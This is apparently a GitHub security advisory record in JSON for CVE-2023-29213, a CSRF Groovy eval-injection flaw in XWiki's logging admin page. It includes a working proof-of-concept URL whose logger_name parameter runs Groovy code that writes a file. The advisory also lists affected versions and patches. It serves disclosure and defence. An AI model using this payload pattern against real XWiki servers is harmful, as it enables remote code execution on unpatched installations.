{"id":"GHSA-4655-wh7v-3vmg","summary":"org.xwiki.platform:xwiki-platform-logging-ui Eval Injection vulnerability","details":"### Impact\n\n\n#### Steps to reproduce:\n\nIt is possible to trick a user with programming rights into visiting \u003cxwiki-host\u003e/xwiki/bin/view/XWiki/LoggingAdmin?loggeraction_set=1&logger_name=%7B%7Bcache%7D%7D%7B%7Bgroovy%7D%7Dnew+File%28%22%2Ftmp%2Fexploit.txt%22%29.withWriter+%7B+out+-%3E+out.println%28%22created+from+notification+filter+preferences%21%22%29%3B+%7D%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fcache%7D%7D&logger_level=TRACE where \u003cxwiki-host\u003e is the URL of your XWiki installation, e.g., by embedding an image with this URL in a document that is viewed by a user with programming rights.\n\n#### Expected result:\n\nNo file in /tmp/exploit.txt has been created.\n\n#### Actual result:\n\nThe file `/tmp/exploit.txt` is been created with content \"created from notification filter preferences!\". This demonstrates a CSRF remote code execution vulnerability that could also be used for privilege escalation or data leaks (if the XWiki installation can reach remote hosts).\n\n\n### Patches\nThe problem has been patched on XWiki 14.4.7, and 14.10.\n\n### Workarounds\nThe issue can be fixed manually applying this [patch](https://github.com/xwiki/xwiki-platform/commit/49fdfd633ddfa346c522d2fe71754dc72c9496ca).\n\n### References\n- https://jira.xwiki.org/browse/XWIKI-20291\n- https://github.com/xwiki/xwiki-platform/commit/49fdfd633ddfa346c522d2fe71754dc72c9496ca\n\n### For more information\nIf you have any questions or comments about this advisory:\n\n*    Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)\n*    Email us at [Security Mailing List](mailto:security@xwiki.org)\n","aliases":["CVE-2023-29213"],"modified":"2026-09-10T03:49:53.456606602Z","published":"2023-04-12T20:35:42Z","database_specific":{"cwe_ids":["CWE-352","CWE-74","CWE-95"],"severity":"CRITICAL","github_reviewed":true,"github_reviewed_at":"2023-04-12T20:35:42Z","nvd_published_at":"2023-04-17T22:15:10Z"},"references":[{"type":"WEB","url":"https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-4655-wh7v-3vmg"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-29213"},{"type":"WEB","url":"https://github.com/xwiki/xwiki-platform/commit/49fdfd633ddfa346c522d2fe71754dc72c9496ca"},{"type":"PACKAGE","url":"https://github.com/xwiki/xwiki-platform"},{"type":"WEB","url":"https://jira.xwiki.org/browse/XWIKI-20291"}],"affected":[{"package":{"name":"org.xwiki.platform:xwiki-platform-logging-ui","ecosystem":"Maven","purl":"pkg:maven/org.xwiki.platform/xwiki-platform-logging-ui"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"4.2-milestone-3"},{"fixed":"13.10.11"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-4655-wh7v-3vmg/GHSA-4655-wh7v-3vmg.json"}},{"package":{"name":"org.xwiki.platform:xwiki-platform-logging-ui","ecosystem":"Maven","purl":"pkg:maven/org.xwiki.platform/xwiki-platform-logging-ui"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"14.0-rc-1"},{"fixed":"14.4.7"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-4655-wh7v-3vmg/GHSA-4655-wh7v-3vmg.json"}},{"package":{"name":"org.xwiki.platform:xwiki-platform-logging-ui","ecosystem":"Maven","purl":"pkg:maven/org.xwiki.platform/xwiki-platform-logging-ui"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"14.5"},{"fixed":"14.10"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-4655-wh7v-3vmg/GHSA-4655-wh7v-3vmg.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"}]}